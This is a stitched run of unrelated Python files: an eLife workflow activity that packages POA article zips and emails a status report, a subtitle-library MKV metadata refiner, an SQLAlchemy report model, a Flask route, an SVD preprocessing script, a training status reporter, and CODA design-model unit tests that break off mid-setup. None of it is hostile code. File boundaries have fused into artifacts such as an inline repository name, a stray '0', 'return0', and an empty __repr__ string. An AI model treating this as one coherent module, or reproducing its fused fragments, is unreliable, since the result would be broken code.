self.ejp_bucket = self.settings.ejp_bucket # Bucket for outgoing files self.publish_bucket = settings.poa_packaging_bucket self.outbox_folder = "outbox/" # Some values to set later self.document = None self.poa_zip_filename = None self.doi = None # Capture errors from generating XML self.error_count = None self.error_messages = None # Track the success of some steps self.activity_status = None self.approve_status = None self.process_status = None self.generate_xml_status = None self.pdf_decap_status = None def do_activity(self, data=None): """ Activity, do the work """ self.logger.info("data: %s" % json.dumps(data, sort_keys=True, indent=4)) # Create output directories self.make_activity_directories() # Download the S3 object self.document = data["data"]["document"] # Download POA zip file self.poa_zip_filename = self.download_poa_zip(self.document) # Get the DOI from the zip file self.doi = get_doi_from_zip_file(self.poa_zip_filename) doi_id = utils.msid_from_doi(self.doi) self.logger.info("DOI: %s" % doi_id) # Approve the DOI for packaging self.approve_status = approve_for_packaging(doi_id) if self.approve_status is False: # Bad. Fail the activity self.activity_status = False else: # Good, continue # Transform zip file self.process_status = self.process_poa_zipfile(self.poa_zip_filename) self.logger.info("Process status: %s" % self.process_status) self.pdf_decap_status = self.check_pdf_decap_failure() self.logger.info("PDF decapitation status: %s" % self.pdf_decap_status) # Set the DOI and generate XML self.download_latest_csv() pub_date = self.get_pub_date(doi_id) volume = utils.volume_from_pub_date(pub_date) try: self.generate_xml(doi_id, pub_date, volume) self.generate_xml_status = True except Exception as exception: self.logger.exception("Exception in generate_xml: %s" % str(exception)) self.generate_xml_status = False self.logger.info("XML generation status: %s" % self.generate_xml_status) # Copy finished files to S3 outbox self.copy_files_to_s3_outbox() # Set the activity status of this activity based on successes self.activity_status = bool( self.process_status is True and self.pdf_decap_status is True and self.generate_xml_status is True ) # Send email self.send_email() # Return the activity result, True or False result = True if self.activity_status is True: self.clean_tmp_dir() # reload the ejpcsvparser/csv_data.py module to clear cached CSV data importlib.reload(parse.data) return result def clean_tmp_dir(self): "custom cleaning of temp directory in order to retain some files for debugging purposes" keep_dirs = ["CSV", "CSV_TMP"] for dir_name, dir_path in self.directories.items(): if dir_name in keep_dirs or not os.path.exists(dir_path): continue shutil.rmtree(dir_path) def get_pub_date(self, doi_id): # Get the date for the first version date_struct = None date_str = lax_provider.article_publication_date( utils.pad_msid(doi_id), self.settings, self.logger ) if date_str is not None: date_struct = time.strptime(date_str, "%Y%m%d000000") else: # Use current date date_struct = time.gmtime() return date_struct def download_poa_zip(self, document): """ Given the s3 object name as document, download it from the POA delivery bucket and save file to disk in the EJP_INPUT dir """ bucket_name = self.settings.poa_bucket storage = storage_context(self.settings) storage_provider = self.settings.storage_provider + "://" orig_resource = storage_provider + bucket_name + "/" storage_resource_origin = orig_resource + document filename_plus_path = os.path.join(self.directories.get("EJP_INPUT"), document) try: with open(filename_plus_path, "wb") as open_file: storage.get_resource_to_file(storage_resource_origin, open_file) except IOError: return None return filename_plus_path def packagepoa_config(self, config_section): "parse the config values from the jatsgenerator config" return poa_conf.parse_raw_config( poa_conf.raw_config(config_section, self.settings.packagepoa_config_file) ) def process_poa_zipfile(self, poa_zip_filename): """ Using the POA transform-ejp-zip-to-hw-zip module """ if poa_zip_filename is None: return False poa_config = self.packagepoa_config(self.settings.packagepoa_config_section) # override the output directories poa_config["output_dir"] = self.directories.get("OUTPUT") poa_config["decapitate_pdf_dir"] = self.directories.get("DECAPITATE_PDF") poa_config["tmp_dir"] = self.directories.get("POA_TMP") try: transform.process_zipfile( zipfile_name=poa_zip_filename, poa_config=poa_config ) return True except zipfile.BadZipfile: return False def check_pdf_decap_failure(self): """ After processing the zipfile there should be a PDF present, as a result of decapitating the file. If not, return false """ pdf_files = glob.glob(self.directories.get("DECAPITATE_PDF") + "/*.pdf") if not pdf_files: return False return True def download_latest_csv(self): """ Download the latest CSV files from S3, rename them, and save to the CSV directory """ # Key: File types, value: file to save as to disk file_types = { "poa_author": "poa_author.csv", "poa_license": "poa_license.csv", "poa_manuscript": "poa_manuscript.csv", "poa_received": "poa_received.csv", "poa_subject_area": "poa_subject_area.csv", "poa_research_organism": "poa_research_organism.csv", "poa_abstract": "poa_abstract.csv", "poa_title": "poa_title.csv", "poa_keywords": "poa_keywords.csv", "poa_group_authors": "poa_group_authors.csv", "poa_datasets": "poa_datasets.csv", "poa_funding": "poa_funding.csv", "poa_ethics": "poa_ethics.csv", } for file_type, filename in list(file_types.items()): # Download s3_key_name = self.ejp.find_latest_s3_file_name(file_type) bucket_name = self.settings.ejp_bucket storage = storage_context(self.settings) storage_provider = self.settings.storage_provider + "://" orig_resource = storage_provider + bucket_name + "/" try: storage_resource_origin = orig_resource + s3_key_name except TypeError: self.logger.info( "PackagePoA unable to download CSV file for {file_type}".format( file_type=file_type ) ) continue filename_plus_path = os.path.join(self.directories.get("CSV"), filename) with open(filename_plus_path, "wb") as open_file: storage.get_resource_to_file(storage_resource_origin, open_file) # log last modified date if available s3_key = storage.get_resource_as_key(storage_resource_origin) self.logger.info( "CSV file %s last_modified: %s" % ( storage_resource_origin, getattr(s3_key, "last_modified", "[unknown]"), ) ) def jatsgenerator_config(self, config_section): "parse the config values from the jatsgenerator config" return jats_conf.parse_raw_config( jats_conf.raw_config( config_section, self.settings.jatsgenerator_config_file ) ) def generate_xml(self, article_id, pub_date=None, volume=None): """ Given DOI number as article_id, use the POA library to generate article XML from the CSV files """ # override the CSV directory in the ejp-csv-parser library jats_config = self.jatsgenerator_config( self.settings.jatsgenerator_config_section ) parse.data.CSV_PATH = self.directories.get("CSV") + os.sep parse.data.TMP_DIR = self.directories.get("CSV_TMP") article = None try: article, self.error_count, self.error_messages = parse.build_article( article_id ) except Exception as exception: self.logger.exception( "Exception in build_article for article_id %s: %s" % (article_id, str(exception)) ) raise # check for errors if self.error_count and self.error_count > 0: exception_message = ( "Exception raised in generate_xml, error count: %s, error_messages: %s" % (self.error_count, ", ".join(self.error_messages)) ) self.logger.exception(exception_message) raise Exception(exception_message) if article: # Here can set the pub-date and volume, if provided if pub_date: pub_date_object = ArticleDate("pub", pub_date) article.add_date(pub_date_object) if volume: article.volume = volume # Override the output_dir in the jatsgenerator config jats_config["target_output_dir"] = self.directories.get("XML_OUTPUT") try: generate.build_xml_to_disk(article_id, article, jats_config, True) except ExpatError as exception: self.logger.exception( "Exception in build_xml_to_disk for article_id %s: %s" % (article_id, str(exception)) ) raise # Copy to output_dir because we need it there xml_files = glob.glob(self.directories.get("XML_OUTPUT") + "/*.xml") for xml_file in xml_files: shutil.copy(xml_file, self.directories.get("OUTPUT")) def copy_files_to_s3_outbox(self): """ Copy local files to the S3 bucket outbox """ # TODO: log which files will be created pdf_files = glob.glob(self.directories.get("DECAPITATE_PDF") + "/*.pdf") for file_name_path in pdf_files: # Copy decap PDF to S3 outbox self.copy_file_to_bucket(file_name_path) xml_files = glob.glob(self.directories.get("XML_OUTPUT") + "/*.xml") for file_name_path in xml_files: # Copy XML file to S3 outbox self.copy_file_to_bucket(file_name_path) zip_files = glob.glob(self.directories.get("OUTPUT") + "/*.zip") for file_name_path in zip_files: # Copy supplements zip file to S3 outbox self.copy_file_to_bucket(file_name_path) def copy_file_to_bucket(self, file_name_path): """ Given a boto bucket (already connected) and path to the file, copy the file to the publish_bucket using the same filename """ # Get the file name from the full file path file_name = file_name_path.split(os.sep)[-1] # Create S3 object and save bucket_name = self.publish_bucket storage = storage_context(self.settings) storage_provider = self.settings.storage_provider + "://" s3_folder_name = self.outbox_folder resource_dest = ( storage_provider + bucket_name + "/" + s3_folder_name + file_name ) storage.set_resource_from_filename(resource_dest, file_name_path) self.logger.info("Copied %s to %s", file_name_path, resource_dest) def send_email(self): """ After do_activity is finished, send emails to recipients on the status """ current_time = time.gmtime() body = self.get_email_body(current_time) subject = self.get_email_subject(current_time) sender_email = self.settings.ses_poa_sender_email recipient_email_list = email_provider.list_email_recipients( self.settings.ses_poa_recipient_email ) for email in recipient_email_list: # send the email by SMTP message = email_provider.simple_message( sender_email, email, subject, body, logger=self.logger ) email_provider.smtp_send_messages( self.settings, messages=[message], logger=self.logger ) self.logger.info( "Email sending details: admin email, email %s, to %s" % ("PackagePOA", email) ) return True def get_email_subject(self, current_time): """ Assemble the email subject """ date_format = "%Y-%m-%d %H:%M" datetime_string = time.strftime(date_format, current_time) activity_status_text = utils.get_activity_status_text(self.activity_status) subject = ( self.name + " " + activity_status_text + " doi: " + str(self.doi) + ", " + datetime_string + ", eLife SWF domain: " + self.settings.domain ) return subject def get_email_body(self, current_time): """ Format the body of the email """ body = "" datetime_string = time.strftime(utils.DATE_TIME_FORMAT, current_time) activity_status_text = utils.get_activity_status_text(self.activity_status) # Bulk of body body += self.name + " status:" + "\n" body += "\n" body += activity_status_text + "\n" body += "\n" body += "document: " + str(self.document) + "\n" body += "doi: " + str(self.doi) + "\n" body += "\n" body += "activity_status: " + str(self.activity_status) + "\n" body += "approve_status: " + str(self.approve_status) + "\n" body += "process_status: " + str(self.process_status) + "\n" body += "pdf_decap_status: " + str(self.pdf_decap_status) + "\n" body += "generate_xml_status: " + str(self.generate_xml_status) + "\n" if self.error_count and self.error_count > 0: body += "\n" body += "XML generation errors:" + "\n" body += "error_count: " + str(self.error_count) + "\n" body += "error_messages: " + ", ".join(self.error_messages) + "\n" body += "\n" body += "SWF workflow details: " + "\n" body += "activityId: " + str(self.get_activityId()) + "\n" body += "As part of workflowId: " + str(self.get_workflowId()) + "\n" body += "As at " + datetime_string + "\n" body += "Domain: " + self.settings.domain + "\n" body += "\n" body += "\n\nSincerely\n\neLife bot" return body def get_doi_from_zip_file(filename=None): """ Get the DOI from the zip file manifest.xml using the POA library Use the object variable as the default if not specified """ if filename is None: return None # Good, continue try: with zipfile.ZipFile(filename, "r") as current_zipfile: return transform.get_doi_from_zipfile(current_zipfile) except zipfile.BadZipfile: return None def approve_for_packaging(doi_id): """ After downloading the zip file but before starting to package it, do all the pre-packaging steps and checks, including to have a DOI """ if doi_id is None: return False return True jippo015/Sub-Zero.bundle # -*- coding: utf-8 -*- import logging import os from babelfish import Error as BabelfishError, Language from enzyme import MKV logger = logging.getLogger(__name__) def refine(video, embedded_subtitles=True, **kwargs): """Refine a video by searching its metadata. Several :class:`~subliminal.video.Video` attributes can be found: * :attr:`~subliminal.video.Video.resolution` * :attr:`~subliminal.video.Video.video_codec` * :attr:`~subliminal.video.Video.audio_codec` * :attr:`~subliminal.video.Video.subtitle_languages` :param bool embedded_subtitles: search for embedded subtitles. """ # skip non existing videos if not video.exists: return # check extensions extension = os.path.splitext(video.name)[1] if extension == '.mkv': with open(video.name, 'rb') as f: mkv = MKV(f) # main video track if mkv.video_tracks: video_track = mkv.video_tracks[0] # resolution if video_track.height in (480, 720, 1080): if video_track.interlaced: video.resolution = '%di' % video_track.height else: video.resolution = '%dp' % video_track.height logger.debug('Found resolution %s', video.resolution) # video codec if video_track.codec_id == 'V_MPEG4/ISO/AVC': video.video_codec = 'h264' logger.debug('Found video_codec %s', video.video_codec) elif video_track.codec_id == 'V_MPEG4/ISO/SP': video.video_codec = 'DivX' logger.debug('Found video_codec %s', video.video_codec) elif video_track.codec_id == 'V_MPEG4/ISO/ASP': video.video_codec = 'XviD' logger.debug('Found video_codec %s', video.video_codec) else: logger.warning('MKV has no video track') # main audio track if mkv.audio_tracks: audio_track = mkv.audio_tracks[0] # audio codec if audio_track.codec_id == 'A_AC3': video.audio_codec = 'AC3' logger.debug('Found audio_codec %s', video.audio_codec) elif audio_track.codec_id == 'A_DTS': video.audio_codec = 'DTS' logger.debug('Found audio_codec %s', video.audio_codec) elif audio_track.codec_id == 'A_AAC': video.audio_codec = 'AAC' logger.debug('Found audio_codec %s', video.audio_codec) else: logger.warning('MKV has no audio track') # subtitle tracks if mkv.subtitle_tracks: if embedded_subtitles: embedded_subtitle_languages = set() for st in mkv.subtitle_tracks: if st.language: try: embedded_subtitle_languages.add(Language.fromalpha3b(st.language)) except BabelfishError: logger.error('Embedded subtitle track language %r is not a valid language', st.language) embedded_subtitle_languages.add(Language('und')) elif st.name: try: embedded_subtitle_languages.add(Language.fromname(st.name)) except BabelfishError: logger.debug('Embedded subtitle track name %r is not a valid language', st.name) embedded_subtitle_languages.add(Language('und')) else: embedded_subtitle_languages.add(Language('und')) logger.debug('Found embedded subtitle %r', embedded_subtitle_languages) video.subtitle_languages |= embedded_subtitle_languages else: logger.debug('MKV has no subtitle track') else: logger.debug('Unsupported video extension %s', extension) from typing import Optional from sqlalchemy.orm import relationship from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy import Column, Integer, String, Unicode, UnicodeText, Numeric, DateTime, SmallInteger, Boolean, select from py_reportit.shared.model.orm_base import Base from py_reportit.shared.model.report_answer import ReportAnswer from py_reportit.shared.util.anonymiser import anonymise class Report(Base): __tablename__ = 'report' id = Column(Integer, primary_key=True) title = Column(Unicode(255)) description = Column(UnicodeText) has_photo = Column(Boolean) latitude = Column(Numeric(8,6)) longitude = Column(Numeric(9,6)) created_at = Column(DateTime) updated_at = Column(DateTime) key_category = Column(String(100)) id_service = Column(SmallInteger) status = Column(Unicode(50)) answers = relationship("ReportAnswer", uselist=True, backref="report") meta = relationship("Meta", uselist=False, backref="report") @property def description_anon(self) -> str: if self.description: return anonymise(self.description) return "" @hybrid_property def service(self) -> Optional[str]: if len(self.answers): return sorted(self.answers, key=lambda answer: answer.order)[-1].author return None @service.expression def service(cls): return select(ReportAnswer.author).where(ReportAnswer.report_id == cls.id).order_by(ReportAnswer.order.desc()).limit(1).as_scalar() def __repr__(self): return f'' @property def has_title(self): return self.title != None and self.title != "" and self.title != "title" 0 # !/usr/bin/python3 # Completely pointless but necessary for a package DominusTea/Distrib-ToyChordsource/routers.py from __main__ import app # a simple page that says hello @app.route('/hello') def hello(): return 'Hello, World!'+str(app.config["BOOTSTRAP_IP"]) src/lsa_prep.py import numpy as np import pandas as pd from scipy.sparse import load_npz from stuff.tools import tfidf_to_counts, decompose # Importing the data filedir = 'C:/data/addm/' seeds = np.array(pd.read_csv(filedir + 'seeds.csv')).flatten() corpus = pd.read_csv(filedir + 'corpus_with_lemmas_clean.csv') doctermat = load_npz(filedir + 'doctermat.npz') # Setting the features and targets X = np.array(doctermat.todense(), dtype=np.uint16) y = np.array(corpus.aucaseyn, dtype=np.uint8) n_range = range(corpus.shape[0]) # Doing the decommpositions svd_10 = decompose(X, n_features=10) svd_25 = decompose(X, n_features=25) svd_50 = decompose(X, n_features=50) svd_100 = decompose(X, n_features=100) svd_200 = decompose(X, n_features=200) # Saving the decompositions np.save(filedir + 'svd_10', svd_10) np.save(filedir + 'svd_25', svd_25) np.save(filedir + 'svd_50', svd_50) np.save(filedir + 'svd_100', svd_100) np.save(filedir + 'svd_200', svd_200) import os import json import ujson from jsonlines import jsonlines from torch.utils.tensorboard import SummaryWriter from bootleg.utils import train_utils class StatusReporter: def __init__(self, args, logger, is_writer, max_epochs, total_steps_per_epoch, is_eval): self.format_str = 'epoch {}, step {}/{}, loss = {:.6f} ({:.3f} sec/batch | {:.3f} sec/batch LOAD), lr: {:.6f}' self.logger = logger self.is_writer = is_writer self.max_epochs = max_epochs self.total_steps_per_epoch = total_steps_per_epoch self.dev_files = {} self.loss_file = "" self.test_files = {} if not is_eval: self.dev_files = self.setup_dev_files(args) self.loss_file = self.setup_loss_file(args) else: self.test_files = self.setup_test_files(args) self.tb_writer = self.setup_tensorboard(args) def setup_tensorboard(self, args): save_folder = os.path.join(train_utils.get_save_folder(args.run_config), "tensorboard") return SummaryWriter(log_dir=save_folder) def setup_test_files(self, args): test_files = {} save_folder = train_utils.get_save_folder(args.run_config) test_file_tag = args.data_config.test_dataset.file.split('.jsonl')[0] test_file = test_file_tag + "_test_results" test_file += train_utils.get_file_suffix(args) test_file += '.jsonl' test_file = os.path.join(save_folder, test_file) # Clear old file open(test_file, 'w').close() test_files[args.data_config.test_dataset.file] = test_file return test_files def setup_dev_files(self, args): dev_files = {} save_folder = train_utils.get_save_folder(args.run_config) dev_file_tag = args.data_config.dev_dataset.file.split('.jsonl')[0] dev_file = dev_file_tag + "_dev_results" dev_file += train_utils.get_file_suffix(args) dev_file += '.jsonl' dev_file = os.path.join(save_folder, dev_file) # Clear old file open(dev_file, 'w').close() dev_files[args.data_config.dev_dataset.file] = dev_file return dev_files def setup_loss_file(self, args): save_folder = train_utils.get_save_folder(args.run_config) loss_file = "loss_results" loss_file += train_utils.get_file_suffix(args) loss_file += '.jsonl' loss_file = os.path.join(save_folder, loss_file) open(loss_file, 'w').close() return loss_file def step_status(self, epoch, step, loss_pack, time, load_time, lr): self.logger.info(self.format_str.format(epoch, step, self.total_steps_per_epoch*self.max_epochs, loss_pack.loss.data.item(), time, load_time, lr)) if self.is_writer: self.dump_loss(epoch, step, loss_pack.loss_dict) self.tb_writer.add_scalar(tag="loss", scalar_value=loss_pack.loss.data.item(), global_step=step) self.tb_writer.add_scalar(tag="lr", scalar_value=lr, global_step=step) return def dump_loss(self, epoch, step, loss_dict): if self.is_writer: with open(self.loss_file, 'a') as f: loss_dict["epoch"] = epoch loss_dict["step"] = step ujson.dump(loss_dict, f) f.write('\n') return def dump_results(self, dict_for_dumping, file, is_test): if self.is_writer: if is_test: assert file in self.test_files, f'The dump file {file} is not in our possible files from {self.test_files.keys()}' else: assert file in self.dev_files, f'The dump file {file} is not in our possible files from {self.dev_files.keys()}' if not is_test: file = self.dev_files[file] file_mode = 'a' else: file = self.test_files[file] file_mode = 'a' with jsonlines.open(file, file_mode) as f: for json_obj in dict_for_dumping: train_head = json_obj["train_head"] eval_slice = json_obj["eval_slice"] tag = "/".join([train_head, eval_slice]) self.tb_writer.add_scalar(tag=tag, scalar_value=json_obj["f1_micro"], global_step=json_obj["global_step"]) f.write(json_obj) return0 import os import unittest import numpy as np try: import mock except ModuleNotFoundError: from unittest import mock from ddt import data, unpack, ddt from .. import models from .. import io from . import DATA_DIR @ddt class TestCODA(unittest.TestCase): def setUp(self): self.inst = inst = models.CODA() characteristics = [] self.values = values = 1, 10, 2, 7.5, 0.3 for x in values: char = mock.Mock() char.value = x characteristics.append(char) inst._characteristics = tuple(characteristics) requirements = [] self.weights = weights = 0.2, 0.1, 0.4, 0.3 for wt in weights: reqt = mock.Mock() reqt.weight = wt requirements.append(reqt) inst._requirements = tuple(requirements) correlation = np.array([[0.1, 0.0, 0.9, 0.3, 0.1], [0.0, 0.9, 0.3, 0.1, 0.1], [0.9, 0.3, 0.1, 0.1, 0.0], [0.3, 0.1, 0.1, 0.0, 0.9]]) self.correlation = correlation # Dummy merit values (these would normally be a fraction). self.merit = np.array([[24, 85, 78, 17, 5], [99, 7, 3, 88, 13], [41, 63, 52, 17, 31], [51, 95, 53, 60, 36]]) class MockRelationship(object): merit_preset = None def __call__(self, x): return self._merit_preset for i in range(correlation.shape[0]): for j in range(correlation.shape[1]): relationship = MockRelationship() relationship.correlation = correlation[i,j] relationship._merit_preset = self.merit[i,j] inst.matrix[i,j] = relationship # ---------------------------------------------------------------- # Test properties # ---------------------------------------------------------------- def test_matrix__unset(self): """Matrix should match shape and contain CODANull by default. """ temp_inst = models.CODA() self.assertEqual(temp_inst.matrix.shape, (0, 0)) self.assertEqual(self.inst.matrix.shape, (4, 5)) temp_inst._requirements += (object(),) self.assertEqual(temp_inst.matrix.shape, (1, 0)) for i, j in zip(*map(range, temp_inst.matrix.shape)): self.assertIsInstance(temp_inst.matrix[i,j], models.CODANull) def test_characteristics__default(self): """Should be an empty tuple by default.""" temp_inst = models.CODA() self.assertIsInstance(temp_inst.characteristics, tuple) self.assertEqual(len(temp_inst.characteristics), 0.0) self.assertEqual(len(self.inst.requirements), 4) def test_correlation(self): """Property converts correlation values in array to a matrix. Each design relationship models a correlation between a requirement and a characteristic parameter. This should therefore be the same dimensions as the overall coda model, i.e. (n, m) where n is the number of requirements, and m the number of characteristics. """ self.assertIsInstance(self.inst.correlation, np.ndarray) self.assertEqual(self.inst.correlation.ndim, 2) self.assertEqual(self.inst.correlation.shape, self.inst.shape) self.assertTrue((self.inst.correlation==self.correlation).all()) @mock.patch.object(models.CODA, 'satisfaction', new_callable=mock.PropertyMock) def test_merit(self, patch): """Sum total of weighted requirement satisfaction.""" patch.return_value = np.arange(5) self.assertAlmostEqual(self.inst.merit, 10) def test_parameter_value(self): """A row vector containing characteristic parameter values. Characteristics are considered to be columns in the underlying coda matrix, so characterstic parameter values should reflect this to be unambiguous. """ self.assertIsInstance(self.inst.parameter_value, np.ndarray) self.assertEqual(self.inst.parameter_value.shape, (1, self.inst.shape[1])) self.assertTrue((self.inst.parameter_value==self.values).all()) @data( (np.array([2.0, 10, 2, 7.5, 0.3]), None), (np.array([[2.0, 10, 2, 7.5, 0.3]]), None), (np.array([[2.0, 10, 2, 7.5, 0.3]]).T, None), ([2.0, 10, 2, 7.5, 0.3], None), (tuple([2.0, 10, 2, 7.5, 0.3]), None), (set([2.0, 10, 2, 7.5, 0.3]), ValueError), ([2.0, 10, 2, 7.5], ValueError), ) @unpack def test_parameter_value__set(self, value, exception): self.assertEqual(self.inst.parameter_value[0,0], 1.0) if exception is not None: self.assertRaises(exception, setattr, self.inst, 'parameter_value', value) else: setattr(self.inst, 'parameter_value', value) self.assertEqual(self.inst.parameter_value[0,0], 2.0) def test_requirements__default(self): """Should be an empty tuple by default.""" temp_inst = models.CODA() self.assertIsInstance(temp_inst.characteristics, tuple) self.assertEqual(len(temp_inst.characteristics), 0.0) self.assertEqual(len(self.inst.requirements), 4) @mock.patch.object(models.CODA, '_merit') @mock.patch.object(models.CODA, 'correlation', new_callable=mock.PropertyMock) def test_satisfaction(self, *mocks): """Weighted requirement satisfactions. This is the merit of each characteristic parameter value for each requirement, weighted by correlation factors. .. math: \frac{\sum_{j=1}^{M} cf .* \eta}{{scf}_i} Where i = [1..n] j = [1..m] and n = number of requirements m = number of characteristics """ correlation, merit = mocks a = np.random.rand(3,2) correlation.return_value = merit.return_value = a # numerator num = np.multiply(a, a).sum(axis=1, keepdims=True) # denominator den = a.sum(axis=1, keepdims=True) expected = np.divide(num, den) self.assertIsInstance(self.inst.satisfaction, np.ndarray) self.assertEqual(self.inst.satisfaction.shape, (3, 1)) np.testing.assert_array_almost_equal(self.inst.satisfaction, expected) def test_shape(self): """Reflects the number of characteristics & requirements. A CODA model involves n requirements and m characteristics, modelled as an (n, m) array/matrix. """ self.assertEqual(self.inst.shape, (4, 5)) def test_weight(self): """A column vector containing requirement weightings. Requirements are considered to be rows in the underlying coda matrix, so requirement weights should reflect this to be unambiguous. """ self.assertIsInstance(self.inst.weight, np.ndarray) self.assertEqual(self.inst.weight.shape, (self.inst.shape[0], 1)) # Note we must transpose the weight column vector to compare # it properly with the simple input weights tuple because of # numpy broadcasting producing a boolean matrix. self.assertTrue((self.inst.weight.T==self.weights).all()) # ---------------------------------------------------------------- # Test methods # ---------------------------------------------------------------- @data( #[('Irrelevant requirement', 0.0, ValueError),], # not enforced [('Unimportant requirement', 0.1, None),], [('Important requirement', 0.9, None),], [('Unimportant requirement', 0.1, None), ('Important requirement', 0.9, None),], [('Sole requirement', 1.0, None),], [('Sole requirement', 1.0, None), ('Another requirement', 0.1, RuntimeError)], ) def test_add_requirement__prenormalised(self, reqts): inst = models.CODA() i = 0 for (name, normwt, exception) in reqts: if exception is None: inst.add_requirement(name, normwt, normalise=False) i += 1 self.assertEqual(len(inst.requirements), i) self.assertEqual(inst.requirements[i-1].name, name) self.assertEqual(inst.requirements[i-1].weight, normwt) else: self.assertRaises(exception, inst.add_requirement, name, normwt, normalise=False) @data( (1.0, 1.0), (1.0, 1.0, 1.0, 1.0), (0.1, 0.2, 0.3, 0.4) ) def test_add_requirement__unnormalised(self, weights): inst = models.CODA() for i, wt in enumerate(weights): inst.add_requirement('Blah'+str(i), wt, normalise=True) self.assertAlmostEqual( sum([r.weight for r in inst.requirements]), 1.0 ) @data( [('Characteristic', 0.0, 1.0, None, None),], [('Characteristic', 0.0, 1.0, 1.0, None), ('Another characteristic', -1.0, 11.0, None, None),], ) def test_add_characteristic(self, chars): inst = models.CODA() i = 0 for (name, llim, ulim, value, exception) in chars: if exception is None: inst.add_characteristic(name, (llim, ulim), value) i += 1 self.assertEqual(len(inst.characteristics), i) self.assertEqual(inst.characteristics[i-1].name, name) self.assertEqual(inst.characteristics[i-1].limits, (llim, ulim)) # Value not set in these test data. #self.assertEqual(inst.characteristics[i-1].value, # value) else: self.assertRaises(exception, inst.add_characteristic, name, normwt) @data( [(0, 0, 'max', 0.1, 1.0, None, None),], [(0, 0, 'min', 0.1, 1.0, None, None),], [(0, 0, 'opt', 0.1, 1.0, 1.0, None),], [(0, 5, 'opt', 0.1, 1.0, 1.0, KeyError),], [(0, 0, 'max', 0.1, 1.0, None, None), (0, 1, 'max', 0.1, 1.0, None, None),], ) def test_add_relationship(self, rels): inst = self.inst for (r, c, type_, corr, tv, tol, exception) in rels: if type_ == 'opt': cls = models.CODAOptimise args = (r, c, type_, corr, tv, tol) else: args = (r, c, type_, corr, tv, tol) if type_ == 'max': cls = models.CODAMaximise else: cls = models.CODAMinimise if exception is None: inst.add_relationship(*args) else: self.assertRaises(exception, inst.add_relationship, *args) continue self.assertIsInstance(inst.matrix[r,c], cls) self.assertEqual(inst.matrix[r,c].correlation, corr) @data( ['Requirement0', 0, None], [0, 'Characteristic0', None], ['requirement0', 0, KeyError], # Case-sensitive for now. ['Requirement2', 0, KeyError], # Not present. ['Requirement0', 'Characteristic0', None], ['Requirement1', 'Characteristic0', None], [1, 'Characteristic0', None], ) @unpack def test_add_relationship__by_name(self, rlkup, clkup, exception): """Given two requirements, 1 characteristic - add relations. """ inst = models.CODA() mock1 = mock.Mock() mock1.name = 'Requirement0' mock3 = mock.Mock() mock3.name = 'Requirement1' inst._requirements = (mock1,mock3) mock2 = mock.Mock() mock2.name = 'Characteristic0' inst._characteristics = (mock2,) if exception is None: inst.add_relationship(rlkup, clkup, 'max', 1.0, 1.0) r = rlkup if isinstance(rlkup, int) else int(rlkup[-1]) self.assertIsInstance(inst.matrix[r,0], models.CODAMaximise) else: self.assertRaises(exception, inst.add_relationship, rlkup, clkup, 'max', 1.0, 1.0) @mock.patch.object(models.CODA, 'add_relationship') @mock.patch.object(models.CODA, 'add_characteristic') @mock.patch.object(models.CODA, 'add_requirement') def test_read_excel(self, mock_add_requirement, mock_add_characteristic, mock_add_relationship): """Constructor adds elements in turn from the parser. The parser provides three methods: - get_requirements - get_characteristics - get_relationships These all return records defined within io.CODASheet. The constructor calls these methods on the parser and uses the results to feed arguments to the add_requirement, add_characteristic and add_relationship methods on the CODA class. This unit test mocks the parser and ensures the known return values for these get methods are passed to the add methods in the correct fashion. """ dummy_records = { 'requirements': [ io.CODASheet.ReqRecord('Requirement 1', 0.33), io.CODASheet.ReqRecord('Requirement 2', 0.5), io.CODASheet.ReqRecord('Requirement 3', 0.17), ], 'characteristics': [ io.CODASheet.CDefRecord('Characteristic 1', 1, 5), io.CODASheet.CDefRecord('Characteristic 2', 10, 20), ], 'relationships': [ io.CODASheet.MinMaxRelRecord( 'Requirement 1', 'Characteristic 1', 'min', '---', # TODO: Remove redundant information 3 ), io.CODASheet.OptRelRecord( 'Requirement 2', 'Characteristic 1', 'opt', 'ooo', 13, 1, ), io.CODASheet.MinMaxRelRecord( 'Requirement 3', 'Characteristic 2', 'max', '+++', 3 ), ] } stub_parser = mock.MagicMock(spec_set=io.CompactExcelParser) for s in 'requirements', 'characteristics', 'relationships': method = getattr(stub_parser, 'get_{}'.format(s)) method.return_value = dummy_records[s] mock_parser_class = mock.Mock() mock_parser_class.return_value = stub_parser sut = models.CODA.read_excel('/dummy/path', parser_class=mock_parser_class) mock_parser_class.assert_called_once_with('/dummy/path') mock_add_requirement.assert_has_calls([ mock.call('Requirement 1', 0.33), mock.call('Requirement 2', 0.5), mock.call('Requirement 3', 0.17), ]) mock_add_characteristic.assert_has_calls([ mock.call('Characteristic 1', (1, 5)), mock.call('Characteristic 2', (10, 20)), ]) mock_add_relationship.assert_has_calls([ mock.call('Requirement 1', 'Characteristic 1', 'min', '---', 3), mock.call('Requirement 2', 'Characteristic 1', 'opt', 'ooo', 13, 1), mock.call('Requirement 3', 'Characteristic 2', 'max', '+++', 3), ]) def test__merit(self): """Returns a matrix of merit values for design relationships. Each design relationship is a model providing a fractional decimal value representing the degree to which a requirement is satisfied by a given characteristic parameter value. This should therefore be the same dimensions as the overall coda model, i.e. (n, m) where n is the number of requirements, and m the number of characteristics. "Internal" method because raw merit values are not considered particularly useful on their own at this point. """ self.assertIsInstance(self.inst._merit(), np.ndarray) self.assertEqual(self.inst._merit().ndim, 2) self.assertEqual(self.inst._merit().shape, self.inst.shape) self.assertTrue((self.inst._merit()==self.merit).all()) class TestCODACaseStudy1(unittest.TestCase): """Case study of a bicycle wheel design based on ref 1.""" def setUp(self): wheel = self.wheel = models.CODA() self._setup_requirements() self._setup_characteristics() self._setup_relationships() def _setup_requirements(self): wheel = self.wheel for name in ('Stiffness', 'Friction', 'Weight', 'Manufacturability', 'Repairability'): wheel.add_requirement(name, 0.2) def _setup_characteristics(self): wheel = self.wheel wheel.add_characteristic('Tyre Diameter', (24, 29), 24) wheel.add_characteristic('Tyre Width', (11, 18), 13) wheel.add_characteristic('Spoke Thickness', (2.8, 5), 4.3) wheel.add_characteristic('Use of Composites', (0.05, 0.8), 0.2) def _setup_relationships(self): wheel = self.wheel reqt = 'Stiffness' wheel.add_relationship(reqt, 0, 'min', 'strong', 29) wheel.add_relationship(reqt, 1, 'max', 'moderate', 12) wheel.add_relationship(reqt, 2, 'max', 'strong', 3) wheel.add_relationship(reqt, 3, 'opt', 'moderate', 0.5, 0.2) reqt = 'Friction' wheel.add_relationship(reqt, 'Tyre Diameter', 'max', 'moderate', 25) wheel.add_relationship(reqt, 'Tyre Width', 'max', 'strong', 11) reqt = 'Weight' 